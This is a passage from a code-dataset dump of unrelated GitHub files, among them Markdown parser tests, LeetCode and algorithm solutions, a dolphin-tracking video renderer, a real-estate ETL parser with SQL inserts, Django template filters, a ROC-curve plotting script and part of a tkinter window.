\"[para(1,1):]\",\n        \"[text(1,1):_:]\",\n        \"[text(1,2): :]\",\n        \"[text(1,3):_:]\",\n        \"[text(1,4): :]\",\n        \"[text(1,5):_:]\",\n        \"[text(1,6): :]\",\n        \"[text(1,7):_:]\",\n        \"[text(1,8): a:]\",\n        \"[end-para:::True]\",\n        \"[BLANK(2,1):]\",\n        \"[para(3,1):]\",\n        \"[text(3,1):a------:]\",\n        \"[end-para:::True]\",\n        \"[BLANK(4,1):]\",\n        \"[para(5,1):]\",\n        \"[text(5,1):---a---:]\",\n        \"[end-para:::True]\",\n    ]\n    expected_gfm = \"\"\"<p>_ _ _ _ a</p>\n<p>a------</p>\n<p>---a---</p>\"\"\"\n\n    # Act & Assert\n    act_and_assert(source_markdown, expected_gfm, expected_tokens)\n\n\n@pytest.mark.gfm\ndef test_thematic_breaks_026():\n    \"\"\"\n    Test case 026: It is required that all of the non-whitespace characters be the same. So, this is not a thematic break:\n    \"\"\"\n\n    # Arrange\n    source_markdown = \"\"\" *-*\"\"\"\n    expected_tokens = [\n        \"[para(1,2): ]\",\n        \"[emphasis(1,2):1:*]\",\n        \"[text(1,3):-:]\",\n        \"[end-emphasis(1,4)::]\",\n        \"[end-para:::True]\",\n    ]\n    expected_gfm = \"\"\"<p><em>-</em></p>\"\"\"\n\n    # Act & Assert\n    act_and_assert(source_markdown, expected_gfm, expected_tokens)\n\n\n@pytest.mark.gfm\ndef test_thematic_breaks_027():\n    \"\"\"\n    Test case 027: Thematic breaks do not need blank lines before or after:\n    \"\"\"\n\n    # Arrange\n    source_markdown = \"\"\"- foo\n***\n- bar\"\"\"\n    expected_tokens = [\n        \"[ulist(1,1):-::2:]\",\n        \"[para(1,3):]\",\n        \"[text(1,3):foo:]\",\n        \"[end-para:::True]\",\n        \"[end-ulist:::True]\",\n        \"[tbreak(2,1):*::***]\",\n        \"[ulist(3,1):-::2:]\",\n        \"[para(3,3):]\",\n        \"[text(3,3):bar:]\",\n        \"[end-para:::True]\",\n        \"[end-ulist:::True]\",\n    ]\n    expected_gfm = \"\"\"<ul>\n<li>foo</li>\n</ul>\n<hr />\n<ul>\n<li>bar</li>\n</ul>\"\"\"\n\n    # Act & Assert\n    act_and_assert(source_markdown, expected_gfm, expected_tokens)\n\n\n@pytest.mark.gfm\ndef test_thematic_breaks_028():\n    \"\"\"\n    Test case 028: Thematic breaks can interrupt a paragraph:\n    \"\"\"\n\n    # Arrange\n    source_markdown = \"\"\"Foo\n***\nbar\"\"\"\n    expected_tokens = [\n        \"[para(1,1):]\",\n        \"[text(1,1):Foo:]\",\n        \"[end-para:::False]\",\n        \"[tbreak(2,1):*::***]\",\n        \"[para(3,1):]\",\n        \"[text(3,1):bar:]\",\n        \"[end-para:::True]\",\n    ]\n    expected_gfm = \"\"\"<p>Foo</p>\n<hr />\n<p>bar</p>\"\"\"\n\n    # Act & Assert\n    act_and_assert(source_markdown, expected_gfm, expected_tokens)\n\n\n@pytest.mark.gfm\ndef test_thematic_breaks_029():\n    \"\"\"\n    Test case 029: If a line of dashes that meets the above conditions for being a thematic break could also be interpreted as the underline of a setext heading, the interpretation as a setext heading takes precedence. Thus, for example, this is a setext heading, not a paragraph followed by a thematic break:\n    \"\"\"\n\n    # Arrange\n    source_markdown = \"\"\"Foo\n---\nbar\"\"\"\n    expected_tokens = [\n        \"[setext(2,1):-:3::(1,1)]\",\n        \"[text(1,1):Foo:]\",\n        \"[end-setext::]\",\n        \"[para(3,1):]\",\n        \"[text(3,1):bar:]\",\n        \"[end-para:::True]\",\n    ]\n    expected_gfm = \"\"\"<h2>Foo</h2>\n<p>bar</p>\"\"\"\n\n    # Act & Assert\n    act_and_assert(source_markdown, expected_gfm, expected_tokens)\n\n\n@pytest.mark.gfm\ndef test_thematic_breaks_030():\n    \"\"\"\n    Test case 030: When both a thematic break and a list item are possible interpretations of a line, the thematic break takes precedence:\n    \"\"\"\n\n    # Arrange\n    source_markdown = \"\"\"* Foo\n* * *\n* Bar\"\"\"\n    expected_tokens = [\n        \"[ulist(1,1):*::2:]\",\n        \"[para(1,3):]\",\n        \"[text(1,3):Foo:]\",\n        \"[end-para:::True]\",\n        \"[end-ulist:::True]\",\n        \"[tbreak(2,1):*::* * *]\",\n        \"[ulist(3,1):*::2:]\",\n        \"[para(3,3):]\",\n        \"[text(3,3):Bar:]\",\n        \"[end-para:::True]\",\n        \"[end-ulist:::True]\",\n    ]\n    expected_gfm = \"\"\"<ul>\n<li>Foo</li>\n</ul>\n<hr />\n<ul>\n<li>Bar</li>\n</ul>\"\"\"\n\n    # Act & Assert\n    act_and_assert(source_markdown, expected_gfm, expected_tokens)\n\n\n@pytest.mark.gfm\ndef test_thematic_breaks_031():\n    \"\"\"\n    Test case 031: If you want a thematic break in a list item, use a different bullet:\n    \"\"\"\n\n    # Arrange\n    source_markdown = \"\"\"\n- Foo\n- * * *\"\"\"\n    expected_tokens = [\n        \"[BLANK(1,1):]\",\n        \"[ulist(2,1):-::2:]\",\n        \"[para(2,3):]\",\n        \"[text(2,3):Foo:]\",\n        \"[end-para:::True]\",\n        \"[li(3,1):2::]\",\n        \"[tbreak(3,3):*::* * *]\",\n        \"[end-ulist:::True]\",\n    ]\n    expected_gfm = \"\"\"<ul>\n<li>Foo</li>\n<li>\n<hr />\n</li>\n</ul>\"\"\"\n\n    # Act & Assert\n    act_and_assert(source_markdown, expected_gfm, expected_tokens)\n\n\n@pytest.mark.gfm\ndef test_thematic_breaks_031o():\n    \"\"\"\n    Test case 031o: variation on 31 with ordered list\n    \"\"\"\n\n    # Arrange\n    source_markdown = \"\"\"\n1) Foo\n1) * * *\"\"\"\n    expected_tokens = [\n        \"[BLANK(1,1):]\",\n        \"[olist(2,1):):1:3:]\",\n        \"[para(2,4):]\",\n        \"[text(2,4):Foo:]\",\n        \"[end-para:::True]\",\n        \"[li(3,1):3::1]\",\n        \"[tbreak(3,4):*::* * *]\",\n        \"[end-olist:::True]\",\n    ]\n    expected_gfm = \"\"\"
<ol>\n<li>Foo</li>\n<li>\n<hr />\n</li>\n</ol>\"\"\"\n\n    # Act & Assert\n    act_and_assert(source_markdown, expected_gfm, expected_tokens)\n","repo_name":"jackdewinter/pymarkdown","sub_path":"test/gfm/test_markdown_thematic_breaks.py","file_name":"test_markdown_thematic_breaks.py","file_ext":"py","file_size_in_byte":10623,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"34"} +{"seq_id":"73776601057","text":"n,m=map(int,input().split()) # rows and columns\nb=[] # list that will hold the input values, by rows and columns\nc=[] # result values\nfor i in range(n): \n    c.append([])\n    b.append(list(map(int,input().split()))) # input values\n    c[i]=[0]*m # make m zeros for each row\nc[0][0]=b[0][0] # the starting point is fixed\nfor j in range(1,m): # the first line (row 0) has no value to compare against anyway,\n    c[0][j]=b[0][j]+c[0][j-1] # so add up the values one by one. --> careful to add the b value here\nfor j in range(1,n): # column 0 likewise has no value to compare against,\n    c[j][0]=b[j][0]+c[j-1][0] # so add up the values one by one\nfor i in range(1,n): # now compare from cell (1,1) onward; adding only the diagonal is pointless since its value is smaller anyway\n    for j in range(1,m): \n        if c[i-1][j]>=c[i][j-1]: # compare the values one row up and one column back, and the larger one\n            c[i][j]=b[i][j]+c[i-1][j]# goes into (i, j).\n        else:\n            c[i][j]=b[i][j]+c[i][j-1]\nprint(c[n-1][m-1]) # that way the maximum comes out\n","repo_name":"goodlucky1215/algorithm","sub_path":"4.백준/11048.py","file_name":"11048.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"18586510025","text":"import pyforms\nfrom pyforms \t\t import BaseWidget\nfrom pyforms.controls import ControlText\nfrom pyforms.controls import ControlProgress\nfrom pyforms.controls import ControlSlider\nfrom pyforms.controls import ControlCombo\nfrom pyforms.controls import ControlButton\nfrom pyforms.controls import ControlImage\nfrom pyforms.controls import ControlPlayer\nfrom pyforms.controls import ControlFile\nfrom dolphinrender.render_positions import RenderPositions\n\nimport cv2, os\n\nclass DolphinRender(BaseWidget):\n\t\n\tdef __init__(self):\n\t\tsuper(DolphinRender,self).__init__('Dolphin render')\n\n\t\tself.set_margin(5)\n\n\t\tself._sceneFile \t= ControlFile('Scene file')\n\n\t\tself._video0 \t\t= ControlFile('Video 0')\n\t\tself._video1 \t\t= ControlFile('Video 1')\n\t\tself._data \t\t\t= ControlFile('Data')\n\t\t\n\t\tself._outputfile \t= ControlText('Output movie')\n\t\t\n\t\tself._exc_btn \t\t= ControlButton('Run')\t\t\n\t\t\n\t\tself.formset = [\n\t\t\t'_sceneFile',\n\t\t\t('_video0', '_video1'),\n\t\t\t('_data', '_outputfile'),\n\t\t\t'_exc_btn'\n\t\t]\n\n\t\tself._data.changed_changed = self.__data_changed\n\t\tself._exc_btn.value \t\t\t\t= self.execute\n\n\n\t\t\"\"\"\n\t\tself._sceneFile.value \t= '/home/ricardo/Downloads/golfinhos/2013.11.23_10.59_scene.obj'\n\t\tself._video0.value \t\t= '/home/ricardo/Downloads/golfinhos/2013.11.23_10.59_Entrada.MP4'\n\t\tself._video1.value \t\t= '/home/ricardo/Downloads/golfinhos/2013.11.23_10.59_Cascata.MP4'\n\t\tself._data.value\t\t= '/home/ricardo/bitbucket/3dengine-project/d-track/output/2013.11.23_10.59_scene_3d_tracking.csv'\n\t\t\"\"\"\n\t\t\n\n\tdef __data_changed(self): \n\t\thead, \t\ttail \t \t = os.path.split(self._data.value)\n\t\tfilename, \textention \t = os.path.splitext(tail)\n\t\tself._outputfile.value = \"{0}_resume.avi\".format(filename)\n\n\n\tdef execute(self):\n\t\tSCENE_FILE \t= self._sceneFile.value\n\t\tVIDEO0 \t\t= self._video0.value\n\t\tVIDEO1 \t\t= self._video1.value\n\n\t\tif not os.path.exists('output'): os.makedirs('output')\n\n\t\t\n\t\toutVideoFilename = os.path.join('output', self._outputfile.value)\n\t\toutvideo = cv2.VideoWriter(outVideoFilename, 
cv2.VideoWriter_fourcc('M','J','P','G'), 30, (1920, 480))\n\t\trun = RenderPositions(SCENE_FILE, self._data.value,VIDEO0, VIDEO1, videowriter = outvideo)\n\t\trun.startScene()\n\n\ndef main(): pyforms.start_app( DolphinRender, geometry=(100,100,900, 180) )\n\nif __name__ == \"__main__\": main()\n\n\"\"\"\n\tSCENE_FILE = '/home/ricardo/subversion/MEShTracker/Dolphin/DOLPHINS/New Videos/2012.12.01_13.48/2012.12.01_13.48_scene.obj'\n\tVIDEO0 = '/home/ricardo/subversion/MEShTracker/Dolphin/DOLPHINS/New Videos/2012.12.01_13.48/2012.12.01_13.48_Entrada (1).MP4'\n\tVIDEO1 = '/home/ricardo/subversion/MEShTracker/Dolphin/DOLPHINS/New Videos/2012.12.01_13.48/2012.12.01_13.48_Cascata (1).MP4'\n\n\tSCENE_FILE = '/home/ricardo/subversion/MEShTracker/Dolphin/DOLPHINS/New Videos/2013.03.16_12.18/2013.03.16_12.18_scene.obj'\n\tVIDEO0 = '/home/ricardo/subversion/MEShTracker/Dolphin/DOLPHINS/New Videos/2013.03.16_12.18/2013 03 16 12 18_Entrada.MP4'\n\tVIDEO1 = '/home/ricardo/subversion/MEShTracker/Dolphin/DOLPHINS/New Videos/2013.03.16_12.18/2013 03 16 12 18_Cascata.MP4'\n\t\n\tif not os.path.isfile(VIDEO0): \t\tprint 'file does not exists \\n',VIDEO0\n\tif not os.path.isfile(VIDEO1): \t\tprint 'file does not exists \\n',VIDEO1\n\tif not os.path.isfile(SCENE_FILE): \tprint 'file does not exists \\n',SCENE_FILE\n\n\t#SCENE_FILE = '/home/ricardo/subversion/MEShTracker/Dolphin/DOLPHINS/New Videos/2013.03.16_12.18/2013.03.16_12.18_scene2render.obj'\n\t#VIDEO0 = '/home/ricardo/subversion/MEShTracker/Dolphin/DOLPHINS/New Videos/2013.03.16_12.18/2013 03 16 12 18_Entrada.MP4'\n\t#VIDEO1 = '/home/ricardo/subversion/MEShTracker/Dolphin/DOLPHINS/New Videos/2013.03.16_12.18/2013 03 16 12 18_Cascata.MP4'\n\toutvideo = cv2.VideoWriter('3dscene.avi', cv2.cv.CV_FOURCC('M','J','P','G'), 30, (1920, 480))\n\trun = RenderPositions(SCENE_FILE,'output/2013 03 16 12 18.csv',VIDEO0, VIDEO1,videowriter = outvideo)\n\trun.startScene()\n\n\t#run.loadData()\n\t#while True: run.process()\n\"\"\"","repo_name":"UmSenhorQualquer/d-track","sub_path":"dolphinrender/DolphinRender.py","file_name":"DolphinRender.py","file_ext":"py","file_size_in_byte":3894,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"30689820610","text":"# Time : O(n) ; Space : O(n)\n\nclass Solution:\n def mostCompetitive(self, nums: List[int], k: int) -> List[int]:\n out = [] \n for i,n in enumerate(nums):\n while out and out[-1] > n and k-len(out)+i < len(nums):\n out.pop() \n out.append(n)\n return out[:k]","repo_name":"Dharaneeshwar/Leetcode","sub_path":"1673. Find the Most Competitive Subsequence DC(21-1-21).py","file_name":"1673. 
Find the Most Competitive Subsequence DC(21-1-21).py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"34"} +{"seq_id":"11427742185","text":"import logging\nimport json\nimport configparser\n\nlogger = logging.getLogger(__name__)\n\ndef json_extract(json_data):\n \"\"\"\n function gets the input json and extract the data tag and returns it\n :param json_data:\n :return: data tag of the json.\n \"\"\"\n if json_data:\n return json.loads(json_data)['data']\n\ndef config_parser():\n \"\"\"\n reads the config.txt and load input file and database connection details.\n \n :return: dictionary having input file and database details\n \n \"\"\"\n config_dict = {'Input-file' :\n {\n 'filepath' : \"\" ,\n 'fileprefix': \"\",\n 'processing_directory': \"\"\n },\n 'database-connection' :\n {\n 'dbname': '',\n 'host': '',\n 'password': '',\n 'port': 5432,\n 'user': ''\n }\n }\n configParser = configparser.RawConfigParser()\n configFilePath = r'.\\config\\config.txt'\n configParser.read(configFilePath)\n\n\n for key,value in config_dict.items():\n for lk in value.keys():\n config_dict[key][lk] = configParser.get(key,lk)\n\n return config_dict\n\n\n\n\ndef get_formatted_dict(data):\n \"\"\"\n function get input json/dictionary extract all the tag/attribute mentioned in config.txt file and return a dictionary having all the input fields.\n in case a field is not found in the input it will replace it with default value mentioned in mapping.txt\n\n :param data: a line in input file in json/dict format.\n :return: Dictionary having required fields for table insert.\n \"\"\"\n tag_to_attr_mapping, col_to_def_value = load_mapping()\n\n for tag in tag_to_attr_mapping.keys():\n try:\n col_to_def_value[tag_to_attr_mapping[tag]] = data[tag]\n\n except KeyError:\n pass\n\n return col_to_def_value\n\ndef load_mapping():\n \"\"\"\n this function will read each colon separated line of config file.\n it will create two dictionary.\n 1. Mapping of the json tag to internal attribute name/column name.\n 2. Mapping of tag to default value in case tag is not found in json.\n\n :return:\n tag_to_attr_mapping : type Dict : contains mapping of the json tag to internal attribute name/column name.\n tag_to_def_value : type Dict : Mapping of tag to default value in case tag is not found in json.\n\n \"\"\"\n #TODO instead of config file replace it with yaml\n tag_to_attr_mapping = {}\n col_to_def_value = {}\n with open(\".\\config\\mapping.txt\",\"r\") as config_file:\n for line in config_file:\n if line[0] == \"#\": #to ignore comments in the config file.\n continue\n try:\n tag, default_value, column_name = line.rstrip(\"\\n\").split(\":\")\n tag_to_attr_mapping[tag] = column_name\n col_to_def_value[column_name] = default_value\n\n except ValueError as e:\n logger.error(\"Got {} for line {}\".format(e,line))\n raise\n return tag_to_attr_mapping, col_to_def_value\n\n\n\ndef business_logic(data):\n \"\"\"\n place holder to implement business logic related parsing. 
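At present it builds the full contact name, prefixes country codes onto bare phone numbers, and folds heating costs into the service charge when they are not already included.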
all the code/calls to functions related to business logic will be here.\n\n :return:\n data : type dict : modified dictionary after applying logic\n \"\"\"\n try:\n # append first_name and last_name to store full name\n data['contact_person'] = data['first_name'] + \" \" + data['last_name']\n\n #append country code to phone numbers\n if data['mobile_number'] !=\"\" and data['mobile_number'][0] != '+' :\n data['mobile_number'] = data['mobile_country'] + data['mobile_number'].replace(\" \",\"\")\n if data['phone_number'] !=\"\" and data['phone_number'][0] != '+':\n data['phone_number'] = data['phone_country'] + data['phone_number'].replace(\" \",\"\")\n\n # if heating cost is not included in service charge, increment service charge with heating cost\n if data['heating_cost_in_service'] == \"NO\":\n #print(data['service_charge'],data['heating_cost'])\n data['service_charge'] = int(data['service_charge']) + int(data['heating_cost'])\n\n\n\n except KeyError as e:\n logger.error(\"Got {} for {}\".format(e,e.args))\n raise\n return data\n\ndef get_insert_query():\n \"\"\"\n function to return all the insert query. keeping it inside parser as names of the parameter are mentioned inside query.\n\n :return:\n query : type string : all the insert query with name of the bind parameters.\n \"\"\"\n\n query = \"\"\"\n \n INSERT into \n fact_flat \n (flat_id, city, agency_id, apartment_type, apartment_size, base_rent, total_rent, rent_scope, number_of_rooms) \n VALUES \n (%(flat_id)s, %(city)s, %(agency_id)s, %(apartment_type)s,%(apartment_size)s, %(base_rent)s, %(total_rent)s, %(rent_scope)s, %(number_of_rooms)s);\n INSERT into \n dim_flat_address \n (flat_id, house_number, street, quarter, city, region, flat_longitude, flat_latitude, post_code) \n VALUES \n (%(flat_id)s, %(house_number)s, %(street)s, %(quarter)s, %(city)s,%(region)s, %(flat_longitude)s, %(flat_latitude)s, %(post_code)s);\n INSERT into \n dim_agency \n (agency_id, company, city, house_number, post_code, street, mobile_number, email, contact_person, phone_number) \n VALUES \n (%(agency_id)s,%(company)s, %(agency_city)s, %(agency_house_number)s, %(agency_post_code)s, %(agency_street)s, %(mobile_number)s, %(email)s, %(contact_person)s, %(phone_number)s) ON CONFLICT (agency_id) DO NOTHING;\n INSERT into \n dim_flat_details\n (flat_id, heating_cost, service_charge, construction_year, refurbishment_year, flat_condition, number_of_floor, garden_available, guest_toilet_available, lift_available,pets_allowed) \n VALUES \n (%(flat_id)s, %(heating_cost)s, %(service_charge)s, %(construction_year)s, %(refurbishment_year)s, %(flat_condition)s, %(number_of_floor)s, %(garden_available)s, %(guest_toilet_available)s,%(lift_available)s,%(pets_allowed)s);\n INSERT into \n dim_flat_metadata \n (flat_id, state, creation_date, modify_date) \n VALUES \n (%(flat_id)s, %(state)s, %(creation_date)s, %(modify_date)s);\n \n \"\"\"\n return query\n\nif __name__ == \"__main__\":\n #print(load_config())\n #print(business_logic({\"first_name\":\"sachin\",\"last_name\":\"vyas\"}))\n #print(business_logic({\"first_name\": \"sachin\", \"lst_name\": \"vyas\"}))\n print(config_parser())","repo_name":"kislerdm/RealStateListing_etl","sub_path":"config/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":6916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"9309638828","text":"from django import template\nfrom django.utils.safestring import mark_safe\nfrom django.template.defaultfilters import 
stringfilter\nfrom django.core.urlresolvers import reverse_lazy\nfrom pypandoc import convert\n\nregister = template.Library()\n\n@register.filter\ndef get_item(dictionary, key):\n return dictionary.get(key)\n\n@register.filter\n@stringfilter\ndef pandoc(text, level=\"1\"):\n return mark_safe(convert(\n text,\n 'html',\n format='md',\n extra_args=['--mathjax',\n '--base-header-level='+level,\n ],\n ))\n\n\n@register.filter\n@stringfilter\ndef content_pandoc(text, level=\"1\"):\n return mark_safe(convert(\n text,\n 'html',\n format='md',\n extra_args=['--mathjax',\n '--base-header-level='+level,\n '--number-sections',\n # '--toc',\n # '--toc-depth=6',\n '--id-prefix=content',\n # '-s',\n ],\n ))\n\n@register.simple_tag\ndef is_started_class(lesson, user):\n effectives = lesson.effective_lessons\n liste = effectives.filter(author=user)\n if liste.exists():\n return mark_safe(\"started\")\n else:\n return mark_safe(\"not-yet\")\n\n@register.simple_tag\ndef href_open_or_not(lesson, user):\n effectives = lesson.effective_lessons\n liste = effectives.filter(author=user)\n if liste.exists():\n return mark_safe(\n \"\"\"\"\"\" % reverse_lazy('oral:detail', args=(user.username, lesson.num))\n )\n else:\n return \"\"\n\n@register.simple_tag\ndef href_close_or_not(lesson, user):\n effectives = lesson.effective_lessons\n liste = effectives.filter(author=user)\n if liste.exists():\n return mark_safe(\"\")\n else:\n return \"\"\n\n@register.simple_tag\ndef put_create_link(lesson, user):\n effectives = lesson.effective_lessons\n liste = effectives.filter(author=user)\n if liste.exists():\n return \"\"\n else:\n return mark_safe(\n \"\"\"Créer\"\"\" % reverse_lazy(\n 'oral:create_lesson',\n args=(user.username, lesson.num)\n )\n )\n\n","repo_name":"ErkanNarmanli/agreg_maths","sub_path":"oral/templatetags/agreg_extra.py","file_name":"agreg_extra.py","file_ext":"py","file_size_in_byte":2652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"6289833982","text":"class IsHappyNumber:\n def isHappy(self, n: int) -> bool:\n visited = set()\n\n while n not in visited:\n nextn = 0\n visited.add(n)\n while n != 0:\n n, v = divmod(n, 10)\n nextn += pow(v, 2)\n n = nextn\n\n return n == 1\n\nif __name__ == '__main__':\n init = IsHappyNumber()\n print(init.isHappy(19))\n print(init.isHappy(3))\n","repo_name":"arunma/DataStructuresAlgorithmsPython","sub_path":"lastmile/leetcode/apple/IsHappyNumber.py","file_name":"IsHappyNumber.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"6728301379","text":"# -*- coding:utf-8 -*-\n\nfrom socket import *\n\nimport time\n\nclient_list = []\n\nfor i in range(11):\n client = socket(AF_INET, SOCK_STREAM)\n client.connect((\"127.0.0.1\", 8080))\n client_list.append(client)\n msg = \"GET / HTTP/1.1\"\n client.send(msg.encode(\"utf-8\"))\n print(client.recv(1024))\n\nfor client in client_list:\n time.sleep(0.5)\n client.close()\n","repo_name":"iditgqs/learn_python_3","sub_path":"02-python核心编程/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"16696260468","text":"import urllib\nimport copy\n\n\nclass RobotFileEats(object):\n\n def __init__(self, contents=None):\n self.__entries = []\n self.__contents = contents\n self.__parse(contents)\n\n def __parse(self, contents):\n \"\"\"parse the input lines 
from a robots.txt file.\n We allow that a user-agent: line is not preceded by\n one or more blank lines.\"\"\"\n lines = contents.split(\"\\n\")\n for line in lines:\n i = line.find('#')\n if i >= 0:\n line = line[:i]\n line = line.strip()\n if not line:\n continue\n line = line.split(':', 1)\n if len(line) == 2:\n line[1] = urllib.unquote(line[1].strip())\n if line[0] == \"User-agent\":\n self._add_entry(\"User-agent\", line[1])\n elif line[0] == \"Disallow\":\n self._add_entry(\"Disallow\", line[1])\n\n elif line[0] == \"Allow\":\n self._add_entry(\"Allow\", line[1])\n\n elif line[0] == \"Sitemap\":\n self._add_entry(\"Sitemap\", line[1])\n\n def _add_entry(self, entry, value):\n self.__entries.append({\"entry\": entry, \"value\": value})\n\n @property\n def entries(self):\n return copy.deepcopy(self.__entries)\n\n def __str__(self):\n return self.__contents\n\n","repo_name":"Etiqa/eats","sub_path":"eats/utils/robots.py","file_name":"robots.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"28434438658","text":"class Solution:\n def canVisitAllRooms(self, rooms: List[List[int]]) -> bool:\n from collections import deque\n size = len(rooms)\n\n visited = set()\n #visited.add(0)\n keys = set()\n keys.add(0)\n\n while keys:\n key = keys.pop()\n visited.add(key)\n new_keys = rooms[key]\n for k in new_keys:\n if k not in visited:\n keys.add(k)\n\n\n return len(visited) == size","repo_name":"sudarshaana/my_leetcode","sub_path":"keys-and-rooms/keys-and-rooms.py","file_name":"keys-and-rooms.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"10099863995","text":"#!/bin/python3\n\n\"\"\"\nPlots a ROC curve of one or more classficiation results.\n\nAuthor: Patrik Goldschmidt (igoldschmidt@fit.vut.cz)\nAuthor: Jan Kučera (jan.kucera@cesnet.cz)\nDate: 2023-07-09\nProject: Windower: Feature Extraction for Real-Time DDoS Detection Using ML\nRepository: https://github.com/xGoldy/Windower\n\"\"\"\n\nimport argparse\nimport logging\n\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport seaborn as sns\nimport sklearn.metrics\n\nimport utils\n\nlogger = logging.getLogger(__name__)\n\nparser = argparse.ArgumentParser()\nparser.add_argument('rmses', metavar='RMSES', nargs='+', type=str,\n help='rmse input files to plot')\nparser.add_argument('-n', '--names', metavar='NAMES', nargs='+', type=str,\n default=['Autoencoder'],\n help='names to plot')\nparser.add_argument('-c', '--colors', metavar='COLORS', nargs='+', type=str,\n default=['darkorange'],\n help='colors to plot')\nparser.add_argument('-L', '--labels', metavar='LABELS', type=str,\n help='labels input file')\nparser.add_argument('-o', '--output', metavar='OUTFILE', type=str,\n default='output.png',\n help='path to write PNG output file')\nparser.add_argument('-l', '--log-level', type=str,\n default='info',\n help='logging level (error, info, debug, ...)')\n\nargs = parser.parse_args()\n\n# Set logging level\nlogging.basicConfig(level=args.log_level.upper())\n\n# ROC plotting function\ndef print_roc(output, labels, rmses) -> None:\n for data in rmses:\n fprs, tprs, threshs = sklearn.metrics.roc_curve(labels, data['rmses'])\n auc = sklearn.metrics.auc(fprs, tprs)\n plt.plot(fprs, tprs, data['color'], label=f\"{data['name']} (AUC=%0.2f)\" % auc)\n\n plt.plot([0, 1], [0, 1], \"darkgray\", linestyle='dashed', label=\"Chance level (AUC=0.5)\")\n 
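# square axes keep FPR and TPR on the same scale, so the chance-level diagonal sits at exactly 45 degrees\n    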
plt.axis(\"square\")\n plt.xlabel(\"False Positive Rate (FPR)\")\n plt.ylabel(\"True Positive Rate (TPR)\")\n plt.legend()\n plt.savefig(output, bbox_inches='tight')\n\n# Load label data\nlogger.info(f\"loading {args.labels}\")\nutils.check_file(args.labels, ext=\"txt\")\nlabel_data = pd.read_csv(args.labels, names=['y_true'])\nlogger.info(f\"loaded {args.labels}, {len(label_data)} records\")\n\nplot_data = []\nfor (file, name, color) in zip(args.rmses, args.names, args.colors):\n\n # Load RMSE data\n logger.info(f\"name {name}, color {color}\")\n logger.info(f\"loading {file}\")\n utils.check_file(file, ext=\"rmse\")\n rmses_data = pd.read_csv(file, names=['losses'])\n logger.info(f\"loaded {file}, {len(rmses_data)} records\")\n\n assert(len(label_data) == len(rmses_data))\n\n plot_data.append({\n 'file': file,\n 'rmses': rmses_data,\n 'name': name,\n 'color': color,\n })\n\nprint_roc(args.output, label_data, plot_data)\n","repo_name":"xGoldy/Windower","sub_path":"src/utils/plot/run-roc.py","file_name":"run-roc.py","file_ext":"py","file_size_in_byte":2710,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"21108777669","text":"from tkinter import*\nfrom PIL import Image, ImageTk\n\n\nclass Developer:\n def __init__(self, root):\n self.root = root\n self.root.geometry(\"1530x790+0+0\")\n self.root.configure(bg=\"#e6fae1\")\n self.root.title(\"Student Management System Developer Window\")\n\n # First header image\n\n img1 = Image.open(\"images/mh1.jpg\")\n img1 = img1.resize((510, 130), Image.ANTIALIAS)\n self.photoimg1 = ImageTk.PhotoImage(img1)\n\n f_lbl = Label(self.root, image=self.photoimg1)\n f_lbl.place(x=0, y=0, width=510, height=130)\n\n # Middle header image\n\n img2 = Image.open(\"images/mh2.jpg\")\n img2 = img2.resize((520, 130), Image.ANTIALIAS)\n self.photoimg2 = ImageTk.PhotoImage(img2)\n\n f_lbl = Label(self.root, image=self.photoimg2)\n f_lbl.place(x=510, y=0, width=510, height=130)\n\n # Third header image\n\n img3 = Image.open(\"images/mh3.jpg\")\n img3 = img3.resize((520, 130), Image.ANTIALIAS)\n self.photoimg3 = ImageTk.PhotoImage(img3)\n\n f_lbl = Label(self.root, image=self.photoimg3)\n f_lbl.place(x=1020, y=0, width=520, height=130)\n\n# <----------- image frame for background of remaining window except header window -------------->\n img4 = Image.open(\"images/bgmain4.jpg\")\n img4 = img4.resize((1530, 710), Image.ANTIALIAS)\n self.photoimg4 = ImageTk.PhotoImage(img4)\n\n bg_img = Label(self.root, image=self.photoimg4)\n bg_img.place(x=0, y=130, width=1530, height=710)\n\n title_lbl = Label(bg_img, text=\"Developer Of Project Student Management System By Facial Recognition \", font=(\n \"'Fredoka One', sans-serif\", 30, \"bold\"), bg=\"#b0c4de\", fg=\"blue\")\n title_lbl.place(x=0, y=0, width=1530, height=50)\n\n # Creating s sub frame inside the image frame\n main_frame = Frame(bg_img, bd=2)\n main_frame.place(x=0, y=52, width=1530, height=650)\n\n # inside the sub frame we create another frame\n\n # Left frame\n Left_frame = LabelFrame(\n main_frame, bd=2, relief=RIDGE, text=\"Developer Window\", font=(\n \"'Fredoka One', sans-serif\", 12, \"bold\"), fg=\"blue\")\n Left_frame.place(x=0, y=0, width=750, height=597)\n\n # profile Image\n\n profile_img = Image.open(\"images/akhil1.jpg\")\n profile_img = profile_img.resize((150, 150), Image.ANTIALIAS)\n self.photoprofile_img = ImageTk.PhotoImage(profile_img)\n\n f_lbl = Label(Left_frame, image=self.photoprofile_img)\n f_lbl.place(x=300, y=0, width=150, 
